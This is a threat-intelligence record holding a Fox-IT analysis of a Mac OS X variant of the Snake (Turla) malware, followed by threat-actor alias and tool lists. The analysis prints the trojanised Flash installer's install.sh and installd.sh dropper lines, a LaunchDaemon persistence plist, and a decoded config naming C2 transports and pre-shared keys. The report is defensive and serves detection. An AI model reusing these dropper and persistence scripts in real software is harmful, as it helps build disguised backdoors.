{ "id": "f4d228ec-2b12-4158-b24f-cddc8e9b5603", "created_at": "2026-04-06T00:12:18.234659Z", "updated_at": "2026-04-10T03:37:50.69935Z", "deleted_at": null, "sha1_hash": "0df9b24c7c8efb2f7fdb66ef7eb173bb7803aeac", "title": "Snake: Coming soon in Mac OS X flavour", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 100730, "plain_text": "Snake: Coming soon in Mac OS X flavour\r\nBy maartenvandantzigfoxit\r\nPublished: 2017-05-03 · Archived: 2026-04-05 20:09:02 UTC\r\nSummary\r\nSnake, also known as Turla, Uroburos and Agent.BTZ, is a relatively complex malware framework used for\r\ntargeted attacks1.\r\nOver the past year Fox-IT has been involved in multiple incident response cases where the Snake framework was\r\nused to steal sensitive information. Targets include government institutions, military and large corporates.\r\nResearchers who have previously analyzed compromises where Snake was used have attributed the attacks to\r\nRussia2. Compared to other prolific attackers with alleged ties to Russia, such as APT28 (Fancy Bear) and APT29\r\n(Cozy Bear), Snake’s code is significantly more sophisticated, its infrastructure more complex and targets more\r\ncarefully selected.\r\nThe framework has traditionally focused on the Windows operating system, but in 2014 the first Linux variant\r\nwas observed3.\r\nNow, Fox-IT has identified a version of Snake targeting Mac OS X.\r\nAs this version contains debug functionalities and was signed on February 21st, 2017 it is likely that the OS X\r\nversion of Snake is not yet operational.\r\nFox-IT expects that the attackers using Snake will soon use the Mac OS X variant on targets.\r\nFunctionality\r\nFor Windows versions the architecture of Snake typically consists of a kernel mode driver designed to hide the\r\npresence of several Snake components and to provide low-level access to network communication. Depending on\r\nthe architecture of a targeted machine either kernel or user mode is used for network communication.\r\nThe OS X version of Snake is a port of the Windows version. References to explorer, Internet Explorer and\r\nNamed Pipes are still present in the binary.\r\nInstall Adobe Flash Player.app\r\nThe Snake binary comes inside of a ZIP archive named Adobe Flash Player.app.zip which is a backdoored\r\nversion of Adobe’s Flash Player installer.\r\nThe install.sh script is patched with the following lines:\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 1 of 8\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n#!/bin/sh\r\nSCRIPT_DIR=$(dirname \u0026quot;$0\u0026quot;)\r\nTARGET_PATH=/Library/Scripts\r\nTARGET_PATH2=/Library/LaunchDaemons\r\ncp -f \u0026quot;${SCRIPT_DIR}/queue\u0026quot; \u0026quot;${TARGET_PATH}/queue\u0026quot;\r\ncp -f \u0026quot;${SCRIPT_DIR}/installdp\u0026quot; \u0026quot;${TARGET_PATH}/installdp\u0026quot;\r\ncp -f \u0026quot;${SCRIPT_DIR}/installd.sh\u0026quot; \u0026quot;${TARGET_PATH}/installd.sh\u0026quot;\r\ncp -f \u0026quot;${SCRIPT_DIR}/com.adobe.update\u0026quot;\r\n\u0026quot;$TARGET_PATH2/com.adobe.update.plist\u0026quot;\r\n\u0026quot;${TARGET_PATH}/installd.sh\u0026quot;\r\n\u0026quot;${SCRIPT_DIR}/Install Adobe Flash Player\u0026quot;\r\nexit $RC\r\nThe installd.sh that is invoked contains the following code:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n#!/bin/bash\r\nSCRIPT_DIR=$(dirname \u0026quot;$0\u0026quot;)\r\nFILE=\u0026quot;${SCRIPT_DIR}/queue#1\u0026quot;\r\nPIDS=`ps cax | grep installdp | grep -o \u0026#039;^[ ]*[0-9]*\u0026#039;`\r\nif [ -z \u0026quot;$PIDS\u0026quot; ]; then\r\n${SCRIPT_DIR}/installdp ${FILE} n\r\nfi\r\nThe shell script checks if installdp is already running, if not it will start with:\r\n1 /Library/Scripts/installdp /Library/Scripts/queue#1 n\r\nPersistence\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 2 of 8\n\nThe backdoor is persisted via Apple’s LaunchDaemon service:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n$ plutil -p /Library/LaunchDaemons/com.adobe.update.plist\r\n{\r\n\u0026quot;ProgramArguments\u0026quot; =\u0026gt; [\r\n0 =\u0026gt; \u0026quot;/Library/Scripts/installd.sh\u0026quot;\r\n]\r\n\u0026quot;KeepAlive\u0026quot; =\u0026gt; 1\r\n\u0026quot;Label\u0026quot; =\u0026gt; \u0026quot;com.apple.update\u0026quot;\r\n\u0026quot;OnDemand\u0026quot; =\u0026gt; 1\r\n\u0026quot;POSIXSpawnType\u0026quot; =\u0026gt; \u0026quot;Interactive\u0026quot;\r\n}\r\nCodesigning details\r\nIn order for an Application to be run on OS X it has to be signed with a valid certificate issued by Apple or it\r\nwould be blocked by GateKeeper (unless configured otherwise). The following, likely stolen, developer certificate\r\nwas used to sign the fake Adobe Flash installer which includes the Snake binary:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\nExecutable=Install Adobe Flash Player.app/Install\r\nIdentifier=com.addy.InstallAdobeFlash\r\nFormat=app bundle with Mach-O thin (x86_64)\r\nCodeDirectory v=20200 size=390 flags=0x0(none) hashes=12+3 location=embedded\r\nHash type=sha1 size=20\r\nCandidateCDHash sha1=ffc1a65f9153c94999212fb8bd7e3950eca035ae\r\nHash choices=sha1\r\nCDHash=ffc1a65f9153c94999212fb8bd7e3950eca035ae\r\nSignature size=4231\r\nAuthority=Developer ID Application: Addy Symonds (EHWBRW848H)\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 3 of 8\n\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nSigned Time=21 Feb 2017 08:55:36\r\nInfo.plist entries=22\r\nTeamIdentifier=EHWBRW848H\r\nSealed Resources version=2 rules=12 files=86\r\nInternal requirements count=1 size=188\r\nFox-IT has informed Apple’s security team with the request to revoke the certificate.\r\nDebug build\r\nSeveral strings found throughout the binary indicate that this version is in fact a debug build.\r\n1 fwrite (\u0026quot;Usage: snake_test e[vent]|n[ormal]\\n\u0026quot;, 0x30uLL, 1uLL, *__stderrp_ptr);\r\n1\r\nfprintf (v16, \u0026quot;[%s:%s:%d] %s\\n\u0026quot;, \u0026quot;../../../snake/snake_test.c\u0026quot;,\r\n\u0026quot;main\u0026quot;, 86LL, err);\r\nAn interesting observation is the fact that the contents of a temporary file storing command output are converted\r\nusing KOI8-R encoding, designed to cover the Russian language, which uses the Cyrillic alphabet.\r\n1 ascii2uni(koi8_str, unicode_str, -1LL, \u0026quot;KOI8-R\u0026quot;);\r\nThis indicates that the developers tested with Russian command output (encoded using the KOI8-R codepage). On\r\nsystems where the command output is displayed in another language (and another codepage), text would be\r\nincorrectly respresented in Cyrillic characters.\r\nQueue file\r\nBuilds of Snake generally contain a Queue file. Queue files are used to store Snake’s configuration data, module\r\nbinaries and queued network packets.\r\n1 $ python MM_snake_queuefile.py queue\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 4 of 8\n\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nOFFSET STREAM TYPE ID SIZE WRITTEN DATA\r\n0x0000006c 00000001 0002 00000227 00000010 2017-02-10 12:23:22\r\n\u0026#039;\\x98\\xa7w{\\xc7\\xcc4\\x03-\\xdcz\\x0b\\xc9,`\\x1c\u0026#039;\r\n0x000000bc 00000001 0002 00000228 00000010 2017-02-10 12:23:22\r\n\u0026#039;\\x90*\\xa6\\xc5c\\x89H\\xe2\u0026gt;\\x9fS\\x1f\\xb2\\x0b\\xf8\\xb7\u0026#039;\r\n0x0000010c 00000001 0002 00000229 00000010 2017-02-10 12:23:22\r\n\u0026#039;\\x95\\x9a\\xdf\\x82\\xf8l\\xbe.YR)\\xcc\\x1a{\\xac\\x8f\u0026#039;\r\n0x0000015c 00000001 0002 000000df 00000009 2017-02-10 12:23:22 \u0026#039;300000\\x00\u0026#039;\r\n0x000001a5 00000001 0002 000000e0 00000009 2017-02-10 12:23:22 \u0026#039;600000\\x00\u0026#039;\r\n0x000001ee 00000001 0002 00000190 00000009 2017-02-10 12:23:22 \u0026#039;20000\\x00\u0026#039;\r\n0x00000237 00000001 0002 000000e1 00000009 2017-02-10 12:23:22 \u0026#039;4096\\x00\u0026#039;\r\n0x00000280 00000001 0002 000000e2 00000009 2017-02-10 12:23:22 \u0026#039;65536\\x00\u0026#039;\r\n0x000002c9 00000001 0002 00000143 00000009 2017-02-10 12:23:22 \u0026#039;4096\\x00\u0026#039;\r\n0x00000312 00000001 0002 00000144 00000009 2017-02-10 12:23:22 \u0026#039;65536\\x00\u0026#039;\r\n0x0000035b 00000001 0002 00000001 00000009 2017-02-10 12:23:22 \u0026#039;1000\\x00\u0026#039;\r\n0x000003a4 fffffffd 0002 00000229 00000010 2017-02-10 12:23:22 \u0026#039;\\xfb\r\n\\xb20\\x87\\xb9m\\xa2\\x80!\\x80\\xcc\\x1aJbX\u0026#039;\r\n0x000003f4 00000001 0002 00000008 00000011 2017-02-10 12:23:22 \u0026#039;0xfd4488e9\\x00\u0026#039;\r\n0x00000445 00000001 0002 00000009 00000009 2017-02-10 12:23:22 \u0026#039;0\\x00\u0026#039;\r\n0x0000048e 00000001 0002 00000064 00000009 2017-02-10 12:23:22 \u0026#039;2\\x00\u0026#039;\r\n0x000004d7 00000001 0002 00000065 00000021 2017-02-10 12:23:22 \u0026#039;enc.unix//tmp/.gdm-socket\\x00\u0026#039;\r\n0x00000538 00000001 0002 00000066 00000031 2017-02-10 12:23:22\r\n\u0026#039;enc.frag.reliable.doms.unix//tmp/.gdm-selinux\\x00\u0026#039;\r\n0x000005a9 00000001 0002 00000070 00000029 2017-02-10 12:23:22\r\n\u0026#039;read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\\x00\u0026#039;\r\n0x00000612 00000001 0002 00000071 00000019 2017-02-10 12:23:22\r\n\u0026#039;psk=R@gw1gBsRP!5!yj0\\x00\u0026#039;\r\n0x0000066b 00000001 0002 000000c8 00000009 2017-02-10 12:23:23 \u0026#039;1\\x00\u0026#039;\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 5 of 8\n\n0x000006b4 00000001 0002 000000c9 00000029 2017-02-10 12:23:23 \u0026#039;enc.http.tcp/car-service.effers.com:80\\x00\u0026#039;\r\n0x0000071d 00000001 0002 000000d4 00000029 2017-02-10 12:23:23\r\n\u0026#039;psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00\u0026#039;\r\n0x00000786 00000001 0002 0000012c 00000009 2017-02-10 12:23:23 \u0026#039;1\\x00\u0026#039;\r\n0x000007cf 00000001 0002 0000012d 00000029 2017-02-10 12:23:23 \u0026#039;enc.http.tcp/car-service.effers.com:80\\x00\u0026#039;\r\n0x00000838 00000001 0002 00000138 00000029 2017-02-10 12:23:23\r\n\u0026#039;psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\\x00\u0026#039;\r\nThe following transport chains are configured in this queue file:\r\n1\r\n2\r\n3\r\nenc.unix//tmp/.gdm-socket read_peer_nfo=Y,psk=!HqACg3ILQd-w7e4\r\nenc.frag.reliable.doms.unix//tmp/.gdm-selinux psk=R@gw1gBsRP!5!yj0\r\nenc.http.tcp/car-service.effers.com:80 psk=1BKQ55n6#OsIgwn*,ustart=bc41f8cd.0\r\nObfuscated strings\r\nSnake binaries contain strings that can be obtained through snake_name_get() call. These strings are stored as a\r\npair of 0x40 byte blobs that are XOR-ed against each other. In this binary the blobs only contain placeholders that\r\nare yet to be replaced by the actual values, which is another indication that this Snake binary is not yet ready to\r\ndeploy to targets.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n00187e20 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|\r\n00187e30 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|\r\n00187e40 35 34 43 41 37 51 55 45 55 45 5f 50 41 54 48 5f |54CA7QUEUE_PATH_|\r\n00187e50 55 4e 49 58 00 00 00 00 00 00 00 00 00 00 00 00 |UNIX............|\r\n00187e60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\n*\r\n00187ea0 00 00 00 00 00 30 31 32 41 30 34 44 45 43 42 43 |.....012A04DECBC|\r\n00187eb0 34 34 31 65 34 39 43 35 32 37 42 32 37 39 38 46 |441e49C527B2798F|\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 6 of 8\n\n9\r\n10\r\n11\r\n00187ec0 35 34 43 41 37 4d 45 4a 49 52 4f 44 5f 50 41 54 |54CA7MEJIROD_PAT|\r\n00187ed0 48 5f 44 41 52 57 49 4e 00 00 00 00 00 00 00 00 |H_DARWIN........|\r\n00187ee0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|\r\nIndicators of compromise\r\nFiles\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n/Library/LaunchDaemons/com.adobe.update.plist\r\n/Library/Scripts/installd.sh\r\n/Library/Scripts/queue\r\n/var/tmp/.ur-*\r\n/tmp/.gdm-socket\r\n/tmp/.gdm-selinux\r\nSHA256:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\nb8ee4556dc09b28826359b98343a4e00680971a6f8c6602747bd5d723d26eaea Install Adobe Flash\r\nPlayer.app.zip\r\n5b7792a16c6b7978fca389882c6aeeb2c792352076bf6a064e7b8b90eace8060 Install\r\n0a77f1b59c829a83d91a12c871fbd30c5c9d04b455f497e0c231cd21104bfea9 install.sh\r\n7848f7808af02ba0466f3a0687cf949c4d29a2d94b035481a3299ec519aaaa30 Install Adobe Flash Player\r\nd5ea79632a1a67abbf9fb1c2813b899c90a5fb9442966ed4f530e92715087ee2 Installdp\r\nb6df610aa5c1254c3af5b2ff806562c4937704e4ac248577cdcd3e7e7b3578a0 com.adobe.update\r\n6e207a375782e3c9d86a3e426cfa38eddcf4898b3556abc75889f7e01cc49506 installd.sh\r\n92721d719b8085748fb66366d202457f6d38bfa108a2ecda71eee7e68f43a387 queue\r\nNetwork\r\nThe following domain is configured in Snake's queue file for HTTP network transport:\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 7 of 8\n\nThe resolving IP belongs to a Satellite communications provider:\r\nThough Snake is typically spread using spear-phishing e-mails and watering hole attacks Fox-IT has not yet\r\nobserved this sample being spread in the wild.\r\nJelle Vergeer, Krijn de Mik, Mitchel Sahertian, Maarten van Dantzig \u0026 Yun Zheng Hu\r\nFox-IT Threat Intelligence\r\nReferences\r\nPublished May 3, 2017May 7, 2017\r\nSource: https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nhttps://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/\r\nPage 8 of 8", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "references": [ "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/" ], "report_names": [ "snake-coming-soon-in-mac-os-x-flavour" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab", "created_at": "2022-10-25T16:07:24.212584Z", "updated_at": "2026-04-10T02:00:04.900038Z", "deleted_at": null, "main_name": "Sofacy", "aliases": [ "APT 28", "ATK 5", "Blue Athena", "BlueDelta", "FROZENLAKE", "Fancy Bear", "Fighting Ursa", "Forest Blizzard", "G0007", "Grey-Cloud", "Grizzly Steppe", "Group 74", "GruesomeLarch", "ITG05", "Iron Twilight", "Operation DealersChoice", "Operation Dear Joohn", "Operation Komplex", "Operation Pawn Storm", "Operation RoundPress", "Operation Russian Doll", "Operation Steal-It", "Pawn Storm", "SIG40", "Sednit", "Snakemackerel", "Sofacy", "Strontium", "T-APT-12", "TA422", "TAG-0700", "TAG-110", "TG-4127", "Tsar Team", "UAC-0028", "UAC-0063" ], "source_name": "ETDA:Sofacy", "tools": [ "ADVSTORESHELL", "AZZY", "Backdoor.SofacyX", "CHERRYSPY", "CORESHELL", "Carberp", "Computrace", "DealersChoice", "Delphacy", "Downdelph", "Downrage", "Drovorub", "EVILTOSS", "Foozer", "GAMEFISH", "GooseEgg", "Graphite", "HATVIBE", "HIDEDRV", "Headlace", "Impacket", "JHUHUGIT", "JKEYSKW", "Koadic", "Komplex", "LOLBAS", "LOLBins", "Living off the Land", "LoJack", "LoJax", "MASEPIE", "Mimikatz", "NETUI", "Nimcy", "OCEANMAP", "OLDBAIT", "PocoDown", "PocoDownloader", "Popr-d30", "ProcDump", "PythocyDbg", "SMBExec", "SOURFACE", "SPLM", "STEELHOOK", "Sasfis", "Sedkit", "Sednit", "Sedreco", "Seduploader", "Shunnael", "SkinnyBoy", "Sofacy", "SofacyCarberp", "SpiderLabs Responder", "Trojan.Shunnael", "Trojan.Sofacy", "USB Stealer", "USBStealer", "VPNFilter", "Win32/USBStealer", "WinIDS", "Winexe", "X-Agent", "X-Tunnel", "XAPS", "XTunnel", "Xagent", "Zebrocy", "Zekapab", "carberplike", "certutil", "certutil.exe", "fysbis", "webhp" ], "source_id": "ETDA", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", "SeaDaddy", "SeaDask", "SeaDesk", "SeaDuke", "Sharp-SMBExec", "SharpView", "Sibot", "Solorigate", "SoreFang", "TinyBaron", "WINELOADER", "WellMail", "WellMess", "cobeacon", "elf.wellmess", "reGeorg", "tDiscoverer" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434338, "ts_updated_at": 1775792270, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": 